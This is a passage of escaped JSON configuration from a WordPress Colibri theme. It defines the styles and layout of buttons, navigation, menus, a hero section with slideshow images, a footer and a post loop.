"gradient\":{\"angle\":\"0\",\"steps\":[{\"color\":\"#00c6fb\",\"position\":\"0\"},{\"color\":\"#005bea\",\"position\":\"100\"}]}}}]},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"${theme.colors.0}\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0|variant3}\"},\"border\":{\"top\":{\"color\":\"${theme.colors.0|variant3}\"},\"left\":{\"color\":\"${theme.colors.0|variant3}\"},\"right\":{\"color\":\"${theme.colors.0|variant3}\"},\"bottom\":{\"color\":\"${theme.colors.0|variant3}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h31\",\"22-h30\"]},{\"id\":31,\"style\":{\"background\":{\"color\":\"transparent\"},\"typography\":{\"color\":\"white\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"weight\":\"600\",\"transform\":\"uppercase\",\"lineHeight\":{\"value\":\"1\"},\"letterSpacing\":{\"value\":\"1\",\"unit\":\"px\"},\"family\":\"Open Sans\",\"margin\":{\"bottom\":\"2rem\"}},\"border\":{\"top\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"bottom\":{\"color\":\"white\",\"radius\":{\"left\":{\"value\":\"56\",\"unit\":\"px\"},\"right\":{\"value\":\"56\",\"unit\":\"px\"}},\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"left\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}},\"right\":{\"color\":\"white\",\"style\":\"solid\",\"width\":{\"value\":\"2\",\"unit\":\"px\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"unit\":\"px\",\"value\":\"15\"},\"left\":{\"unit\":\"px\",\"value\":\"30\"},\"right\":{\"unit\":\"px\",\"value\":\"30\"}},\"descendants\":{\"icon\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"margin\":{\"left\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"states\":{\"hover\":{\"background\":{\"color\":\"rgba(255, 255, 255, 0.25)\"},\"border\":{\"top\":{\"color\":\"${theme.colors.4}\"},\"left\":{\"color\":\"${theme.colors.4}\"},\"right\":{\"color\":\"${theme.colors.4}\"},\"bottom\":{\"color\":\"${theme.colors.4}\"}}}},\"textAlign\":\"center\"},\"type\":\"hop-button\",\"props\":{\"buttonSize\":\"large\"},\"v\":\"1.1\",\"nodes\":[\"7-h32\",\"22-h31\"]},{\"id\":32,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"nodeId\":\"7-h35\",\"nodes\":[\"7-h33\"],\"v\":\"1.1\"},{\"id\":33,\"type\":\"hop-image\",\"nodeId\":\"7-h36\",\"nodes\":[\"7-h34\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"overlay\":{\"background\":{\"overlay\":{\"enabled\":false}}}}},\"props\":{\"enabledFrameOption\":true}},{\"id\":34,\"type\":\"hop-header\",\"nodeId\":\"4443-h1\",\"v\":\"1.1\",\"nodes\":[\"10-h1\",\"25-h1\"]},{\"id\":35,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"10-h2\",\"25-h2\"],\"nodeId\":\"10-h2\"},{\"id\":36,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\",\"25-h3\"]},{\"id\":37,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h4\",\"25-h4\"],\"nodeId\":\"10-h4\"},{\"id\":38,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"10-h5\",\"25-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}},\"nodeId\":\"10-h5\"},{\"id\":39,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"10-h6\",\"v\":\"1.1\",\"nodes\":[\"10-h6\",\"25-h6\"]},{\"id\":40,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\",\"25-h7\"]},{\"id\":41,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"10-h8\",\"25-h8\"],\"nodeId\":\"10-h8\"},{\"id\":42,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"10-h9\",\"25-h9\"],\"nodeId\":\"10-h9\"},{\"id\":43,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\",\"25-h10\"]},{\"id\":44,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\",\"25-h11\"]},{\"id\":45,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\",\"25-h13\"]},{\"id\":46,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\",\"25-h14\"]},{\"id\":47,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\",\"25-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":48,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\",\"25-h16\"]},{\"id\":49,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\",\"25-h17\"]},{\"id\":50,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\",\"25-h12\"]},{\"id\":51,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\",\"25-h18\"]},{\"id\":52,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\",\"25-h19\"]},{\"id\":53,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\",\"25-h20\"]},{\"id\":54,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\",\"25-h21\"]},{\"id\":55,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\",\"25-h22\"]},{\"id\":56,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\",\"25-h23\"]},{\"id\":57,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"none\",\"color\":\"${theme.colors.0}\",\"overlay\":{\"shape\":{\"value\":\"many-rounded-squares-blue\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"light\":0,\"color\":{\"value\":\"${theme.colors.5}\",\"opacity\":\"0.7\",\"opacity_\":0},\"enabled\":false,\"type\":\"color\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"rgba(183,33,255, 0)\"},{\"position\":\"100\",\"color\":\"rgba(33,212,253, 0)\"}]}},\"image\":[{\"source\":{\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]},\"type\":\"gradient\",\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1.webp\"},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/youtu.be\\/BEsPBL5z22E\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":10},\"bottom\":{\"unit\":\"px\",\"value\":\"50\"}},\"separatorBottom\":{\"type\":\"mountains\",\"color\":\"${theme.colors.4}\",\"height\":{\"value\":\"70\",\"unit\":\"px\"},\"enabled\":true,\"negative\":false},\"customHeight\":{\"min-height\":{\"unit\":\"px\",\"value\":147},\"type\":\"fit-to-content\"},\"separatorTop\":{\"enabled\":false,\"height\":{\"unit\":\"px\",\"value\":110},\"color\":\"white\",\"type\":\"techno\",\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textWithMediaOnRight\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"nodeId\":\"10-h29\",\"nodes\":[\"10-h25\",\"25-h24\"],\"v\":\"1.1\"},{\"id\":58,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"10-h37\",\"nodes\":[\"10-h26\",\"25-h25\"],\"v\":\"1.1\"},{\"id\":59,\"type\":\"hop-column\",\"nodeId\":\"10-h38\",\"nodes\":[\"10-h27\",\"25-h26\"],\"v\":\"1.1\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}}},{\"id\":60,\"type\":\"hop-page-title\",\"nodeId\":\"10-h39\",\"nodes\":[\"10-h28\",\"25-h27\"],\"v\":\"1.1\"},{\"id\":61,\"type\":\"hop-footer\",\"props\":{\"useFooterParallax\":true},\"v\":\"1.1\",\"nodes\":[\"13-f1\",\"28-f1\"]},{\"id\":62,\"type\":\"hop-section\",\"style\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"30\"},\"bottom\":{\"path\":\"value\",\"value\":\"30\"}}},\"v\":\"1.1\",\"nodes\":[\"13-f2\",\"28-f2\"]},{\"id\":63,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalInnerGap\":1,\"verticalGap\":1,\"horizontalGap\":1},\"media\":{\"mobile\":{\"layout\":{\"verticalGap\":2,\"horizontalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"13-f3\",\"28-f3\"]},{\"id\":64,\"type\":\"hop-column\",\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":1,\"verticalInnerGap\":1},\"media\":{\"mobile\":{\"layout\":{\"horizontalInnerGap\":2,\"verticalInnerGap\":2}}}},\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}},\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}}}}}},\"v\":\"1.1\",\"nodes\":[\"13-f4\",\"28-f4\"]},{\"id\":65,\"type\":\"hop-copyright\",\"nodeId\":\"13-f6\",\"v\":\"1.1\",\"nodes\":[\"13-f5\",\"28-f5\"]},{\"id\":66,\"type\":\"hop-main\",\"nodeId\":\"71-m1\",\"v\":\"1.1\",\"nodes\":[\"432-m1\",\"31-m1\"],\"style\":{\"background\":{\"color\":\"${theme.colors.4}\"},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"40\",\"y\":\"10\",\"spread\":\"0\",\"color\":\"rgba(1, 51, 74, 0.15)\"}]},\"border\":{\"top\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}},\"bottom\":{\"radius\":{\"left\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"value\":\"5\",\"unit\":\"px\"}}}},\"media\":{\"tablet\":{\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"mobile\":{\"margin\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":\"10\",\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":\"10\",\"unit\":\"px\"}}}},\"margin\":{\"top\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"props\":{\"attrs\":{\"overflowOption\":\"hidden\"}}},{\"id\":67,\"type\":\"hop-section\",\"nodeId\":\"16-m29\",\"nodes\":[\"432-m2\",\"31-m2\"],\"style\":{\"padding\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"\",\"unit\":\"px\"}}},\"v\":\"1.1\",\"props\":{\"width\":\"boxed\"}},{\"id\":68,\"props\":{\"layout\":{\"equalWidth\":false}},\"type\":\"hop-row\",\"nodeId\":\"16-m33\",\"nodes\":[\"432-m25\",\"31-m25\"],\"v\":\"1.1\"},{\"id\":69,\"type\":\"hop-column\",\"nodeId\":\"16-m34\",\"nodes\":[\"432-m26\",\"31-m26\"],\"v\":\"1.1\"},{\"id\":70,\"props\":{\"headerType\":\"2\"},\"type\":\"hop-heading\",\"nodeId\":\"16-m35\",\"nodes\":[\"432-m27\",\"31-m27\"],\"v\":\"1.1\"},{\"id\":71,\"type\":\"hop-text\",\"nodeId\":\"16-m36\",\"nodes\":[\"432-m28\",\"31-m28\"],\"v\":\"1.1\"},{\"id\":72,\"type\":\"hop-post-loop\",\"nodeId\":\"23-m35\",\"style\":{\"background\":{\"color\":\"\"}},\"v\":\"1.1\",\"nodes\":[\"432-m3\",\"31-m3\"]},{\"id\":73,\"type\":\"hop-loop-item\",\"nodeId\":\"23-m36\",\"v\":\"1.1\",\"nodes\":[\"432-m4\",\"31-m4\"],\"style\":{\"background\":{\"color\":\"\"},\"padding\":{\"left\":{\"unit\":\"px\",\"value\":\"\"},\"right\":{\"unit\":\"px\",\"value\":\"\"},\"top\":{\"unit\":\"px\",\"value\":\"\"},\"bottom\":{\"unit\":\"px\",\"value\":\"\"}}},\"props\":{\"layout\":{\"vSpace\":{\"value\":\"0\"},\"horizontalInnerGap\":0,\"verticalInnerGap\":0}}},{\"id\":74,\"type\":\"hop-post-thumbnail\",\"nodeId\":\"23-m37\",\"style\":{\"background\":{\"color\":\"rgba(255,255,255,0)\"}},\"v\":\"1.1\",\"nodes\":[\"432-m5\",\"31-m5\"]},{\"id\":75,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"itemsPerRow\":1,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalGap\":{\"unit\":\"px\",\"value\":\"\"},\"horizontalInnerGap\":{\"unit\":\"px\",\"value\":\"\"},\"verticalInnerGap\":{\"unit\":\"px\",\"value\":\"\"}}}},\"type\":\"hop-row\",\"nodeId\":\"1723-m26\",\"v\":\"1.1\",\"nodes\":[\"432-m6\",\"31-m6\"]},{\"id\":76,\"type\":\"hop-column\",\"nodeId\":\"1723-m27\",\"props\":{\"layout\":{\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\